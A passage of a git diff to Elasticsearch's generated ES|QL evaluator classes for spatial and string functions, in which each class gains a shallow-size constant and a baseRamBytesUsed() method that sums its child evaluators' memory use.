a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToLongFromStringEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StGeotileToLongFromStringEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileToLongFromStringEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeotileToLongFromStringEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -103,6 +106,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java index aece0da62cd23..6f45f7aea646a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StGeotileToStringFromLongEvaluator.java @@ -7,6 +7,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.LongBlock; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StGeotileToStringFromLongEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StGeotileToStringFromLongEvaluator.class); + private final EvalOperator.ExpressionEvaluator gridId; public StGeotileToStringFromLongEvaluator(Source source, EvalOperator.ExpressionEvaluator gridId, @@ -101,6 +104,13 @@ public void close() { Releasables.closeExpectNoException(gridId); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += gridId.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java index a29c7a9db4a5a..92fac3ff4c73f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public StXFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java index a63b6feaf838b..ad6d9f43046f6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXMaxFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMaxFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMaxFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java index 2b05369d62ef1..62dd60fe286eb 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMaxFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXMaxFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMaxFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMaxFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java index f457bb8170e89..c8d3942689680 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXMinFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMinFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMinFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java index 56421bd391d33..98155fa1c9f2e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StXMinFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StXMinFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StXMinFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StXMinFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java index 0f3347d6d34fb..a2e25b9a40cf6 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator in; public StYFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator in, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(in); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += in.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java index 7121a9abe0a99..eecf029a4b722 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYMaxFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMaxFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMaxFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java index a0041df774c83..73add8d49053b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMaxFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYMaxFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMaxFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMaxFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java index b8ac6a10f84e3..b5459287be404 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYMinFromWKBEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMinFromWKBEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMinFromWKBEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java index 9d10fd812ceca..f29787e75fb43 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/spatial/StYMinFromWKBGeoEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class StYMinFromWKBGeoEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(StYMinFromWKBGeoEvaluator.class); + private final EvalOperator.ExpressionEvaluator wkb; public StYMinFromWKBGeoEvaluator(Source source, EvalOperator.ExpressionEvaluator wkb, @@ -118,6 +121,13 @@ public void close() { Releasables.closeExpectNoException(wkb); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += wkb.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java index acf9613b29e7a..f3f79b3facbd4 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/AutomataMatchEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.apache.lucene.util.automaton.ByteRunAutomaton; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; @@ -26,6 +27,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class AutomataMatchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AutomataMatchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator input; @@ -58,6 +61,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += input.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock inputBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef inputScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java index b7fc1d5f84ad4..c24d6bfecda67 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/BitLengthEvaluator.java @@ -9,6 +9,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class BitLengthEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(BitLengthEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock valBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java index 93c264a2e5b87..ee11e877388d3 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ByteLengthEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ByteLengthEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ByteLengthEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, BytesRefBlock valBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { BytesRef valScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java index b703013654295..b4130114797bc 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ChangeCaseEvaluator.java @@ -8,6 +8,7 @@ import java.lang.String; import java.util.Locale; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code ConvertEvaluatorImplementer} instead. */ public final class ChangeCaseEvaluator extends AbstractConvertFunction.AbstractEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ChangeCaseEvaluator.class); + private final EvalOperator.ExpressionEvaluator val; private final Locale locale; @@ -128,6 +131,13 @@ public void close() { Releasables.closeExpectNoException(val); } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public static class Factory implements EvalOperator.ExpressionEvaluator.Factory { private final Source source; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java index 9d22936ba7d02..5738f81040bec 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/ConcatEvaluator.java @@ -10,6 +10,7 @@ import java.util.Arrays; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -27,6 +28,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ConcatEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ConcatEvaluator.class); + private final Source source; private final BreakingBytesRefBuilder scratch; @@ -63,6 +66,15 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + for (EvalOperator.ExpressionEvaluator e : values) { + baseRamBytesUsed += e.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + public BytesRefBlock eval(int positionCount, BytesRefBlock[] valuesBlocks) { try(BytesRefBlock.Builder result = driverContext.blockFactory().newBytesRefBlockBuilder(positionCount)) { BytesRef[] valuesValues = new BytesRef[values.length]; diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java index f9b96479e87a4..56140d4f193c0 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class EndsWithEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EndsWithEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator str; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += str.baseRamBytesUsed(); + baseRamBytesUsed += suffix.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock strBlock, BytesRefBlock suffixBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef strScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java index 6eac2084410c8..88096c576db8f 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashConstantEvaluator.java @@ -9,6 +9,7 @@ import java.lang.String; import java.util.function.Function; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BytesRefBlock; import org.elasticsearch.compute.data.BytesRefVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final 